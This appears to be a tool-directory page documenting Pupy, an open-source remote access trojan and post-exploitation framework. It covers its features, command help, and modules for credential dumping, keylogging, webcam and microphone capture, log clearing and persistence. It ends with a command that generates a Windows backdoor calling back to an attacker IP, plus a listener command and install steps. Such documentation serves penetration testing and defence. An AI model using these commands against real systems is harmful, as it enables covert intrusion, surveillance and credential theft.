Pupy
Pupy Description
Pupy is an opensource, cross-platform (Windows, Linux, OSX, Android) remote administration and post-exploitation tool mainly written in python
Pupy is a cross-platform, multi function RAT and post-exploitation tool mainly written in python. It features an all-in-memory execution guideline and leaves a very low footprint. Pupy can communicate using multiple transports, migrate into processes using reflective injection, and load remote python code, python packages and python C-extensions from memory.
Features:
- Windows payload can load the entire Python interpreter from memory using a reflective DLL.
- Pupy does not touch the disk.
- Can be packed into a single .py file and run without any dependencies other than the python standard library on all OSes.
- PyCrypto gets replaced by pure Python AES & RSA implementations when unavailable.
- Reflectively migrate into other processes.
- Remotely import pure python packages (.py, .pyc) and compiled python C extensions (.pyd, .so) from memory.
- Imported python modules do not touch the disk.
- Easily extensible, modules are simple to write and are sorted by os and category.
- Modules can directly access python objects on the remote client using rpyc.
- Access remote objects interactively from the pupy shell and get auto-completion of remote attributes.
- Communication transports are modular and stackable. Exfiltrate data using HTTP over HTTP over AES over XOR, or any combination of the available transports.
- Communicate using obfsproxy pluggable transports.
- Execute noninteractive commands on multiple hosts at once.
- Commands and scripts running on remote hosts are interruptible.
- Auto-completion for commands and arguments.
- Custom config can be defined: command aliases, modules. automatically run at connection, etc.
- Open interactive python shells with auto-completion on the all-in-memory remote python interpreter.
- Interactive shells (cmd.exe, /bin/bash, etc) can be opened remotely.
- Remote shells on Unix & Windows clients have a real tty with all keyboard signals working just like an SSH shell.
- Execute PE executable remotely and from memory.
- Generate payloads in various formats:
Format | Architecture | Short Name |
---|---|---|
Android Package | x86 & ARMv7 | apk |
Linux Binary | x86 | lin_x86 |
Linux Binary | x64 | lin_x64 |
Linux Shared Object | x86 | so_x86 |
Linux Shared Object | x64 | so_x64 |
Windows PE Executable | x86 | exe_x86 |
Windows PE Executable | x64 | exe_x64 |
Windows DLL | x86 | dll_x86 |
Windows DLL | x64 | dll_x64 |
Python Script | x86 & x64 | py |
PyInstaller | x86 & x64 | pyinst |
Python Oneliner | x86 & x64 | py_oneliner |
Powershell | x86 & x64 | ps1 |
Powershell Oneliner | x86 & x64 | ps1_oneliner |
Ducky Script | N/A | rubber_ducky |
- Deploy in memory from a single command line using python or powershell one-liners.
- Embed "scriptlets" in generated payloads to perform some tasks "offline" without needing network connectivity (ex: start keylogger, add persistence, execute custom python script, check_vm, etc.)
- Multiple Target Platforms:
Platform | Support Status |
---|---|
Windows XP | Supported |
Windows 7 | Supported |
Windows 8 | Supported |
Windows 10 | Supported |
Linux | Supported |
Mac OSX | Limited Support |
Android | Limited Support |
Homepage: https://github.com/n1nj4sec/pupy
Author: Nicolas VERDIER
License: AS IS
Pupy Help
gen Help
Usage:
gen [-f {client,py,pyinst,py_oneliner,ps1,ps1_oneliner,rubber_ducky,csharp,.NET,.NET_oneliner}] [-O {android,windows,linux,solaris}] [-A {x86,x64}] [-U] [-P PACKER] [-S] [-o OUTPUT] [-d] [-D OUTPUT_DIR] [-s SCRIPTLET] [-l] [-E] [--no-use-proxy] [--oneliner-nothidden] [--debug-scriptlets] [--debug] [--workdir WORKDIR] [{bind,auto_proxy,dnscnc,connect}] ...
Options:
positional arguments: {bind,auto_proxy,dnscnc,connect} Choose a launcher. Launchers make payloads behave differently at startup. launcher_args launcher options optional arguments: -h, --help show this help message and exit -f {client,py,pyinst,py_oneliner,ps1,ps1_oneliner,rubber_ducky,csharp,.NET,.NET_oneliner}, --format {client,py,pyinst,py_oneliner,ps1,ps1_oneliner,rubber_ducky,csharp,.NET,.NET_oneliner} (default: client) -O {android,windows,linux,solaris}, --os {android,windows,linux,solaris} Target OS (default: windows) -A {x86,x64}, --arch {x86,x64} Target arch (default: x86) -U, --uncompressed Use uncompressed template -P PACKER, --packer PACKER Use packer when 'client' output format (default: ) -S, --shared Create shared object -o OUTPUT, --output OUTPUT output filename -d <ATTEMPTS> <MIN SEC> <MAX SEC>, --delays-list <ATTEMPTS> <MIN SEC> <MAX SEC> Format: <max attempts> <min delay (sec)> <max delay (sec)> -D OUTPUT_DIR, --output-dir OUTPUT_DIR output folder (default: /root/.config/pupy/output) -s SCRIPTLET, --scriptlet SCRIPTLET offline python scriptlets to execute before starting the connection. Multiple scriptlets can be privided. -l, --list list available formats, transports, scriptlets and options -E, --prefer-external In case of autodetection prefer external IP --no-use-proxy Don't use the target's proxy configuration even if it is used by target (for ps1_oneliner only for now) --oneliner-nothidden Powershell script not hidden target side (default: False) --debug-scriptlets don't catch scriptlets exceptions on the client for debug purposes --debug build with the debug template (the payload open a console) --workdir WORKDIR Set Workdir (Default = current workdir)
listen Help
Usage:
listen [-h] [-l | -L | -a TRANSPORT [TRANSPORT_ARG1 ...] | -A TRANSPORT [TRANSPORT_ARG1 ...] | -r TRANSPORT]
Options:
-h, --help show this help message and exit -l, --list show current listeners -L, --list-transports show available transports -a TRANSPORT [TRANSPORT_ARG1 ...], --add TRANSPORT [TRANSPORT_ARG1 ...] start listener -A TRANSPORT [TRANSPORT_ARG1 ...], --add-no-pproxy TRANSPORT [TRANSPORT_ARG1 ...] start listener (ignore pproxy) -r TRANSPORT, --remove TRANSPORT stop listener
connect Help
Usage:
connect [-h] -c <host:port> [-t {obfs3,http,ssl,ecm,tcp_cleartext,dfws,rsa,udp_secure,kc4,ec4,ws,scramblesuit,udp_cleartext,ssl_rsa}]
Options:
positional arguments: transport_args Transport arguments: key=value key=value ... optional arguments: -h, --help show this help message and exit -c <host:port>, --host <host:port> host:port of the pupy server to connect to. You can provide multiple --host arguments to attempt to connect to multiple IPs -t {obfs3,http,ssl,ecm,tcp_cleartext,dfws,rsa,udp_secure,kc4,ec4,ws,scramblesuit,udp_cleartext,ssl_rsa}, --transport {obfs3,http,ssl,ecm,tcp_cleartext,dfws,rsa,udp_secure,kc4,ec4,ws,scramblesuit,udp_cleartext,ssl_rsa} The transport to use
sessions Help
Usage:
sessions [-h] [-i] [-g] [-k ] [-K] [-d ] [-D]
Options:
-h, --help show this help message and exit -i <filter>, --interact <filter> change the default --filter value for other commands -g, --global-reset reset --interact to the default global behavior -k <id> Kill the selected session -K Kill all sessions -d <id> Drop the connection (abruptly close the socket) -D Drop all connections
jobs Help
Usage:
jobs [-h] [-k| -K ] [-l] [-p ]
Options:
-h, --help show this help message and exit -k <job_id>, --kill <job_id> print the job current output before killing it -K <job_id>, --kill-no-output <job_id> kill job without printing output -l, --list list jobs -p <job_id>, --print-output <job_id> print a job output
run Help
Usage:
run [-h] [-1] [-o OUTPUT] [-f] [-b] <module> ...
Options:
positional arguments: <module> module <arguments> module arguments optional arguments: -h, --help show this help message and exit -1, --once Unload new deps after usage -o OUTPUT, --output OUTPUT save command output to file.%t - timestamp, %h - host, %m - mac, %c - client shortname, %M - module name, %p - platform, %u - user, %a - ip address -f <client filter>, --filter <client filter> filter to a subset of all clients. All fields available in the "info" module can be used. example: run get_info -f 'platform:win release:7 os_arch:64' -b, --background run in background
Modules
CATEGORY NAME HELP --------------------------------------------------------------------------------------------------------------- admin shares List Local And Remote Shared Folder And Permission admin ls List System Files admin wmic Query Wmi Using Wql admin psh Load/Execute Powershell Scripts admin ssh Ssh Client admin rfs Mount Remote Fs As Fuse Fs To Mountpoint admin smbspider Walk Through A Smb Directory And Recursively Search A String Into Files admin reg Search/List/Get/Set/Delete Registry Keys/Values admin shell_exec Execute Shell Commands On A Remote System admin logs Show Logs (Or Try To Search Something) admin alive Request To Send Keepalive Packets On Rpyc Level admin rdesktop Start A Remote Desktop Session Using A Browser Websocket Client admin cp Copy File Or Directory admin interactive_shell Open An Interactive Command Shell With A Nice Tty admin rm Remove A File Or A Directory admin smb Copy Files Via Smb Protocol admin hibernate Close Session During X Hours admin netstat List Terminal Sessions admin drives List Valid Drives In The System admin become Become User admin sshell Interactive Ssh Shell admin last List Terminal Sessions admin rdp Enable / Disable Rdp Connection Or Check For Valid Credentials On A Remote Host admin w List Terminal Sessions admin getdomain Get Primary Domain Controller admin cd Change Directory admin date Get Current Date admin pexec Execute Shell Commands Non-Interactively On A Remote System In Background Using Popen admin ps List Processes admin zip Zip / Unzip File Or Directory admin mkdir Create An Empty Directory admin dns Retrieve Domain Name From Ip And Vice Versa admin clear_logs Clear Event Logs admin psexec Launch Remote Commands Using Smbexec Or Wmiexec admin pyexec Execute Python Code On A Remote System admin beroot Check For Privilege Escalation Path admin cat Show Contents Of A File admin pyshell Open An Interactive Python Shell On The Remote Client admin mv Move File Or Directory admin display Set Display Variable admin ip List Interfaces admin sudo_alias Write An Alias For Sudo To Retrieve User Password admin igd Upnp Igd Client admin stat Show A Bit More Info About File Path. Acls/Caps/Owner For Now admin http Trivial Get/Post Requests Via Http Protocol admin x509 Fetch Certificate From Server admin getppid List Parent Process Information admin getpid List Process Information admin services List Services admin getuid Get Username admin pwd Get Current Working Dir creds loot_memory Crawl Processes Memory And Look For Cleartext Credentials creds creddump Download The Hives From A Remote Windows System And Dump Creds creds lazagne Retrieve Passwords Stored On The Target creds mimipy Run Mimipy To Retrieve Credentials From Memory creds memstrings Dump Printable Strings From Process Memory For Futher Analysis exploit mimishell Execute Mimikatz From Memory (Interactive) exploit mimikatz Execute Mimikatz From Memory (Non-Interactive) exploit exploit_suggester Exploit Suggester exploit shellcode_exec Executes The Supplied Shellcode On A Client exploit impersonate List/Impersonate Process Tokens gather keylogger A Keylogger To Monitor All Keyboards Interaction Including The Clipboard <img draggable="false" class="emoji" alt="?" src="https://s.w.org/images/core/emoji/12.0.0-1/svg/1f642.svg"> gather hashmon Try To Find Clear Text Passwords In Memory gather get_info Get Some Informations About One Or Multiple Clients gather contacts To Get Contacts gather isearch Use Windows Search Index To Search For Data gather search Walk Through A Directory And Recursively Search A String Into Files gather check_vm Check If Running On Virtual Machine gather outlook Interact With Outlook Session Of The Targeted User gather record_mic Record Sound With The Microphone ! gather pywerview Rewriting Of Some Powerview'S Functionalities In Python gather apps To Interact Manage Applications gather call To Get Call Details gather gpstracker To Interact With Gps gather mouselogger Log Mouse Clicks And Take Screenshots Of Areas Around It gather powerview Execute Powerview Commands gather get_hwuuid Try To Get Uuid (Dmi) Or Machine-Id (Dbus/Linux) gather webcamsnap Take A Webcam Snap gather usniper Globally Capture String Or Register During Execution At Specified gather cloudinfo Retrieve Ec2/Digitalocean Metadata gather users Get Interactive Users gather screenshot Take A Screenshot gather ttyrec Globally Capture Intput/Output To Tty. Compatible With Kernels general exit Exit The Client On The Other Side general process_kill Kill A Process manage upload Upload A File/Directory To A Remote System manage edit Edit Remote File Locally (Download->Edit->Upload) manage hide_process Edit Current Process Argv & Env Not To Look Suspicious manage download Download A File/Directory From A Remote System manage getprivs Manage Current Process Privileges manage tasks Get Info About Registered Background Tasks manage memory_exec Execute A Executable From Memory manage lock_screen Lock The Session manage duplicate Duplicate The Current Pupy Payload By Executing It From Memory manage load_package Load A Python Package Onto A Remote Client. Packages Files Must Be Placed In One Of The Pupy/Packages/<Os>/<Arch>/ Repository manage migrate Migrate Pupy Into Another Process Using Reflective Dll Injection manage write Write Short String To File manage env List/Get/Set/Unset Client Environment Variables manage persistence Enable / Disable Persistence network port_scan Run A Tcp Port Scan network forward Local/Remote Port Forwarding And Socks Proxy network tcpdump Module To Reproduce Some Of The Classic Tcpdump Tool Functions privesc getsystem Try To Get Nt Authority System Privileges privesc bypassuac Be Carefull, Most Of Bypass Methods Are Detected By Av... privesc inveigh Execute Inveigh Commands privesc privesc_checker Linux Privilege Escalation Scripts troll text_to_speach Use Android Text To Speach To Say Something troll vibrate Activate The Phone/Tablet Vibrator troll msgbox Pop Up A Custom Message Box
Usage Example Pupy
Create an executable backdoor file (-f client) for a 64-bit version (-A x64) of Windows (-O windows), which after launch will connect to the attacker's computer (connect) which has an IP address of 192.168.1.112 and is listening to the port 43210 (--host 192.168.1.112:43210), while using HTTP-like syntax (-t http) as a transport:
gen -f client -O windows -A x64 connect --host 192.168.1.112:43210 -t http
Starting a listener on an attacker's computer waiting for a connection using an HTTP similar transport (http) on port 43210:
listen -a http 43210
How to install Pupy
For details on installation, see the article ‘How to install Pupy’.
How to install Pupy in Kali Linux
sudo apt install git libssl1.0-dev libffi-dev python-dev python-pip build-essential swig tcpdump python-virtualenv git clone --recursive https://github.com/n1nj4sec/pupy cd pupy python create-workspace.py -DG pupyw sudo pip2 install rpyc==3.4.4
How to install Pupy in BlackArch
sudo pacman -S pupy sudo pacman -Rdd python2-rpyc sudo pip2 install rpyc==3.4.4
Pupy Screenshots
Comments are Closed